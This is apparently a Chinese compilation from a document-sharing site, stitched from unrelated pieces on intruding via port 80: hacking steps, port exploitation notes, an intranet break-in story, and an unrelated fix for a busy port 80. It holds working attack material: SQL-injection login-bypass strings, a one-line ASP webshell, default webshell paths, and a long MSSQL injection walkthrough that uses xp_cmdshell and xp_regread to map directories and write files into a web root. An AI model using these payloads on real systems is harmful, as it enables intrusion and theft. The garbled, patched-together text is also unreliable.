着手于80端口入侵的步骤
入侵的基本步骤(精)

黑客攻击的基本步骤不要步骤化,只是提供基本思路!在实践中,观察,分析,灵活,这样才可能成功。
被条条框框限制住,很难成功的。
黑客攻击的基本步骤:搜集信息实施入侵上传程序、下载数据利用一些方法来保持访问,如后门、特洛伊木马隐藏踪迹信息搜集在攻击者对特定的网络资源进行攻击以前,他们需要了解将要攻击的环境,这需要搜集汇总各种与目标系统相关的信息,包括机器数目、类型、操作系统等等。
踩点和扫描的目的都是进行信息的搜集。
攻击者搜集目标信息一般采用7个基本步骤,每一步均有可利用的工具,攻击者使用它们得到攻击目标所需要的信息。
找到初始信息找到网络的地址范围找到活动的机器找到开放端口和入口点弄清操作系统弄清每个端口运行的是哪种服务画出网络图1. 找到初始信息攻击者危害一台机器需要有初始信息,比方一个IP地址或一个域名。
实际上获取域名是很容易的一件事,然后攻击者会根据已知的域名搜集关于这个站点的信息。
比方服务器的IP地址〔不幸的是服务器通常使用静态的IP地址〕或者这个站点的工作人员,这些都能够帮助发起一次成功的攻击。
搜集初始信息的一些方法包括:开放来源信息〔open source information〕在一些情况下,公司会在不知不觉中泄露了大量信息。
公司认为是一般公开的以及能争取客户的信息,都能为攻击者利用。
这种信息一般被称为开放来源信息。
开放的来源是关于公司或者它的合作伙伴的一般、公开的信息,任何人能够得到。
这意味着存取或者分析这种信息比较容易,并且没有犯罪的因素,是很合法的。
这里列出几种获取信息的例子:公司新闻信息:如某公司为展示其技术的先进性和能为客户提供最好的监控能力、容错能力、服务速度,往往会不经意间泄露了系统的操作平台、交换机型号、及基本的线路连接。
公司职工信息:大多数公司网站上附有地址簿,在上面不仅能发现CEO和财务总监,也可能知道公司的VP和主管是谁。
新闻组:现在越来越多的技术人员使用新闻组、论坛来帮助解决公司的问题,攻击者看这些要求并把他们与电子信箱中的公司名匹配,这样就能提供一些有用的信息。
图解网络入侵的过程

图解网络入侵的过程图解网络入侵的过程引言经济社会的发展要求各用户之间的通信和资源共享,需要将一批计算机连成网络,这样就隐含着很大的风险,包含了极大的脆弱性和复杂性,特别是对当今最大的网络——国际互联网,很容易遭到别有用心者的恶意攻击和破坏。
随着国民经济的信息化程度的提高,有关的大量情报和商务信息都高度集中地存放在计算机中,随着网络应用范围的扩大,信息的泄露问题也变得日益严重,因此,计算机网络的安全性问题就越来越重要。
本文主要是写了网络上几种入侵的过程一、简单的"黑客"入侵TCP/IP协议顺序号预测攻击是最简单的"黑客"入侵,也是系统安全的最大威胁。
在网络上,每台计算机有惟一的IP地址,计算机把目标IP地址和一个惟一的顺序号加载于传输的每一个数据包上。
在一个TCP连接中,接收机只收到具有正确IP地址和顺序号的那个包裹。
许多安全设备,如路由器,只允许有一定IP地址的计算机收发传送。
TCP/IP 顺序号预测入侵将使用网络给计算机赋址的方式和包裹交换的顺序来企图访问网络。
一般来说,"黑客"进行TCP/IP 顺序号预测攻击分两步:第一,得到服务器的IP地址。
黑客一般通过网上报文嗅探,顺序测试号码,由WEB浏览器连接到结点上并在状态栏中寻找结点的IP地址。
因为黑客知道其他计算机有一个与服务器IP地址部分公用的IP地址,他便尽力模拟一个能让其通过路由器和作为网络用户访问系统的IP号码。
例如,如果系统的IP 地址为192.0.0.15,黑客便知有近256台计算机可以连入一个C级网,并猜出所有最后位在序列中出现过的地址号码。
IP 地址指示了一个网络连接的计算机数,同时上述地址的高字节中两个最重要的位设定指出了该网为C级网,下图显示了黑客是怎祥预测C级网的IP号码的。
"黑客"用服务器的IP地址来猜测其他网络地址第二,黑客在试过网上IP地址之后,便开始监视网下传送包的序列号,然后,黑客将试图推测服务器能产生的下一个序列号,再将自己有效地插入服务器和用户之间。
黑网站的一般入侵步骤

黑网站的一般入侵步骤首先,观察指定网站。
黑网站的入侵指定网站是需要条件的:要先观察这个网站是动态还是静态的。
首先介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、 JSP等代码编写的站点如果是静态的(.htm或html),一般是不会成功的。
如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。
Quote:以下是入侵网站常用方法:1.上传漏洞如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.2.注入漏洞字符过滤不严造成的3.暴库:把二级目录中间的/换成%5c4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。
我收集了一下。
类似的还有:’or’’=’" or "a"="a ’) or (’a’=’a") or ("a"="a or 1=1-- ’ or ’a’=’a5.社会工程学。
这个我们都知道吧。
就是猜解。
6.写入ASP格式数据库。
就是一句话木马〈%execute request("value")%〉(数据库必需得是ASP或ASA的后缀)7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.比如:默认数据库,默认后台地址,默认管理员帐号密码等8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL./Databackup/dvbbs7.MDB/bbs/Databackup/dvbbs7.MDB/bbs/Data/dvbbs7.MDB/data/dvbbs7.mdb/bbs/diy.asp/diy.asp/bbs/cmd.asp/bbs/cmd.exe/bbs/s-u.exe/bbs/servu.exe工具:网站猎手挖掘鸡明小子9.查看目录法:一些网站可以断开目录,可以访问目录。
入侵内网一般过程

渗透国内某知名公司内部局域网经过来源:未知时间:2009-08-0613:25编辑:菇在江湖本文的目标是一国内知名公司的网络,本文图片、文字都经过处理,均为伪造,如有雷同,纯属巧合。
最近一个网友要我帮他拿他们公司内网一项重要的文件,公司网络信息朋友都mail给我了,这些信息主要是几张网络拓扑图以及在内网嗅探到的信息(包括朋友所在的子网的设备用户名及密码等信息……)。
参照以上信息总体整理了一下入侵的思路,如果在朋友机器安装木马,从内部连接我得到一个CMD Shell,须要精心伪装一些信息还有可能给朋友带来麻烦,所以选择在该网络的网站为突破口,而且管理员不会认为有“内鬼”的存在。
用代理上肉鸡,整体扫描了一下他的网站,只开了80端口,没扫描出来什么有用的信息,就算有也被外层设备把信息过滤掉了,网站很大整体是静态的网页,搜索一下,查看源文件->查找->.asp。
很快找到一个类似http://www.*****.com/news/show1.asp?NewsId=125272页面,在后面加上and1=1 、and1=2前者正常,后者反回如下错误。
Microsoft OLE DB Provider for ODBC Driver error'80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”./news/show/show1.asp,行59是IIS+MSSQL+ASP的站,在来提交:http://www.*****.com/news/show1.asp?NewsId=125272and 1=(selectis_srvrolemember('sysadmin'))http://www.*****.com/news/show1.asp?NewsId=125272and 'sa'=(select system_user)结果全部正常,正常是说明是当前连接的账号是以最高权限的SA运行的,看一下经典的“sp_cmdshell”扩展存储是否存在,如果存在那就是初战告捷。
入侵个人主机网络攻击的步骤

入侵个人主机网络攻击的步骤第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
不同端口的入侵方法

21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
135端口
135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。
网上教程非常多,不多说了。
137端口
137端口统共NetBIOS 数据报(UDP)服务。
139端口
139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
电脑80端口被占用是什么原因.doc

电脑80端口被占用是什么原因笔记本80端口被程序进程占用的处理方法1、运行中输入cmd;2、在命令行中输入netstat -ano,得到端口号对应的PID;3、打开任务管理器,点击查看菜单,选择选择列,给进程列表中添加PID列,然后找到PID对应的进程就可以了。
相关阅读:出现问题的常见的几种情况:1、卸载internet信息服务--万维网服务。
这个是最常见的故障,或者其他一些第三方的服务器软件,必须在进程里面结束,才有效果。
2、迅雷等程序或者一些其他有上传功能的软件都会占用电脑的80端口3、netstat -abno后查看,经过查找为pid=4的system进程,因为是系统进程,也无法结束它,经查SQL Server ReportingServices (SQLEXPRESS) 服务占用80端口,停止SQL Server ReportingServices后APache正常启动.备注:杀掉进程的命令:taskkill /pid 4 /f 其中/f 表示强制关闭该进程首先介绍一种网上普遍的方法,就是查找占据80端口的进程,然后关闭它就行了。
1、运行cmd,然后输入netstat -ano,回车;2、查看开头几行包含0.0.0.0:80的那一行最后的pid,为几个数字,把这几个数字记下来;3、启动任务管理器进程,在工具栏选择列前面的框里打上勾;4、然后找到与刚才那个pid对应的是哪个程序,很容易就会找到,就是它与0.0.0.0:80进行了绑定(bind);结束这个进程,再点击Apache的Start按钮,终于出现了那个Running 。
上述的办法可能WIN7I行不通,接下来是另外一种办法Win7的80端口默认是被System进程占用的。
用如下方法可以解决System进程占用80端口的问题:打开RegEdit:开始-运行-输入regedit-调出注册表找到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esHTTP找到一个DWORD值Start,将其改为0重启电脑,System进程将不会占用80端口查询:查看占用80端口的信息,那么可以在cmd窗口输入netstat -ano | findstr 80 命令由于80端口是上网协议中最常用的协议,所以经常造成80端口被占用。
入侵常识

首先你得有个ASP木马,最好是免杀的。要不一传上去就直接给查杀了。
然后用工具 明小子 或阿D 等注入工具。找一下他的上传漏洞,或者找注入点,并破解他的后台管理员和密码。最后登录上去传你的ASP木马。
当你上传成功ASP木马后,然后用网页浏览你的ASP木马路径,如果显示你的马,那就说明你成功拿到他的WEBSHELL了。也就是可以通过ASP木马完全可以浏览他的磁盘文件了(包括他的主页文件)。
address:XXX.XXX.XXX.XXX
然后输入server 显示出来的IP就总 服务器的地址了。
第2种:确定对方的系统,和服务版本。ping一般都不管用了,很少有傻B管理员连放火墙都不装的。首先看看对方有无开21和23 ,开了23就在cmd下输入
其实,在英文原意里,“Hacker(黑客)”最初的意思是指一类计算机高手,这类人有喜欢研究系统漏洞的嗜好,他们并不入侵别人系统;而真正入侵别人系统的人被叫作“Cracker(怪客)”。
其实会入侵网站的“黑客”没什么了不起,真正厉害的是背后那些找出系统漏洞的“黑客”。这就好像会利用游戏密技破关的人其实并不怎么厉害,真正从无到有,找出游戏隐藏秘密的人才叫高手。可是对于从未接触过游戏的人来说,他其实分不出“使用密技”与“找出密技”的差别,他只要看到有人会破关就觉得很厉害,而这也是大多数不了解“黑客”与“怪客”差异的人,就会认为他们两者都是高手。这些所谓能入侵的黑客,真的没你想像中这么“神奇”,别被电影的情节给骗了!不过,既然大家早已“黑、怪”不分,那我们就把他们都叫作黑客吧!
从上面可以看出我给192.168.1.1发50个数据包。返回了48个,其中有两个丢失,返回速度最快为40ms,最慢为51ms,平均速度为46ms.TTL为128是NT系统。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
着手于80端口入侵的步骤第一种方法:利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)建立表语句:/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:\’--返回:正常信息。
说明写入C盘的所有目录成功了!爽!接下来就是取表了!暴它出来。
(好像只有暴这种方法了)语句:/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’@Inetpub’转换为数据类型为int 的列时发生语法错误。
再依次爆出表中的目录名称!语句:http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’test’转换为数据类型为int 的列时发生语法错误。
再依次爆出表中的目录名称!好我们继续语句:http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’,’test’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’haha’转换为数据类型为int 的列时发生语法错误。
再依次爆出表中的目录名称!好了,你应该知道怎么做了吧,哈哈,就是把得到的表名添到那个括号里,有多少就放多少吧,一点技巧:有时候你会发现当输入类似/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-时不是显示出错,而是网页显示正常晕了吧,别紧张哈看看0<>(select top 1 paths from dirs) 说明返回是一个数字,哈哈,测试一下看看是多少吧100>(select top 1 paths from dirs)返回正常哈哈,用这种大于小于的方法很快就能猜出了好我们继续比如当出现59=(select top 1 paths from dirs)返回正常,ok,说明名字是59输入如下http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’59’))--记得带上引号哟下面的方法就和原来的一样的了还有一个问题就是有时候用上面的方法输入59时,发现下一次的文件夹还是59这个是怎么回事情呢?呵呵,不知道你有没有注意过059和59是一样的?就是这个原因了,哈哈,http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’059’))--发现显示下一个文件夹名字了,ok优缺点分析:优点就是所有的sqlserver用户都可以使用,因为xp_dirtree适用权限PUBLIC,缺点是显示的是目录下的所有文件夹的名字,而且排列好像是没有什么顺序的,总之在好几千好几万个文件夹里找你想要的文件夹是痛苦的.而且你知道了有那个文件夹也不能保证在根目录下,实在是痛苦的一件事情呀,很多时候是靠运气和耐力.祝你成功方法二:利用xp_cmdshell哈哈,这个大家一定很熟悉了吧,我就简单说一下建立表语句:/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell ’dir c:\ /B/D’--返回:正常信息。
说明写入C盘的所有目录成功了!这里用了dir c:\ /B/D,哈哈,不知道/B/D 什么作用就试验试验看语句:/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’@Inetpub’转换为数据类型为int 的列时发生语法错误。
再依次爆出表中的目录名称!语句:http:///down/list.asp?id=1and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’test’转换为数据类型为int 的列时发生语法错误。
再依次爆出表中的目录名称!方法同上,就不说了有时候我们也可以用下面的两个扩展来干些事情1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入dirs表中:5 ;insert dirs exec master.dbo.xp_availablemedia;--我们可以通过查询temp的内容来获得驱动器列表及相关信息(2)我们可以利用xp_subdirs获得子目录列表,并存入dirs表中:5 ;insert into dirs exec master.dbo.xp_subdirs ’c:\’;--优缺点分析:很明显了,这样就不会出现xp_dirtree那种所有目录都放在一起的情况了,只会显示一级目录,找起来方便多了.缺点也很明显,只有sa有这个权限,也有可能管理员删除了这个扩展(毕竟太强大了).方法三:这种方法很好下面这个是原文想到了使用adsutil.vbs程序,我是这样执行的a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt’;--是不是很长啦通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯),导入到 a.txt中对于 a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题,不过遇到管理员把adsutil.vbs,删了或是放到别的地方我们就没办法了(不可能自已用echo 命令写一个吧)第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧.....xp_cmdshell ’echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs’;-- .....xp_cmdshell ’echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs’;--.....-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa & "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa &"\dd.asp",2,true)fil1.writeline ""---------------cut here-------------------------------------第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯执行http://x.x.x.x/dd.asp返回:\xxx哈哈,的确是好方法,不过原文好像有点问题就是set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2,true)两句提交时会出错于是我们想到了加号,和&的功能相同还有就是写点什么东西到dd.asp呢?写入pa,哈哈哈哈,改成了-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa "\dd.asp",2,true)fil1.writeline pa---------------cut here--------------------------------------因为用浏览器提交时号被转换成了空格,所以在提交的时候还应该把变成%2B,好了,应该可以了,如下-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true)fil1.writeline pa---------------cut here--------------------------------------如果发现1没有的话,我们可以该成2,3,4...........a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt’;--但是这种方法只能在windows2000下使用,因为2003下新建的网站所在地址不是按照1234来排列的,好像是随机生成的,个人比较过几个2003下的地址,没有发现什么规律.优缺点分析同上xp_cmdshell不是每一个用户都可以用的!还有一个问题是adsutil文件不一定存在,或者不一定在那个路径上,当然如果你原意的话你可以用echo写一个(哈哈,老多老多行的哟),另外的一个问题是,如果主机上有很多站点怎么办?我遇到过一个有九个站点的主机,胆识只有第8个是有用的,晕了吧,很难有人有嗯那个耐性会坚持到那么多的,早就崩溃了或许.还有就是不能在2003下用!不过说实话,这个方法的确是一个好方法方法四:这个方法是要饭的提到的,通过xp_regread等从注册表里读出路径以下推荐,获取网页路径(通过存储过程达到对注册表的读取):利用内置存储过程xp_regread(读取注册表键值,权限public):语句:http:///list.asp?classid=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @testvarchar(20) exec master..xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths(path) values(@test)IIS的默认路径的在注册表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\利用爆字段将数据库的值读出来:语句:http:///list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回:Microsoft OLE DB Provider forODBC Drivers 错误80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server]将varchar 值E:\www,,201 转换为数据类型为int 的列时发生语法错误。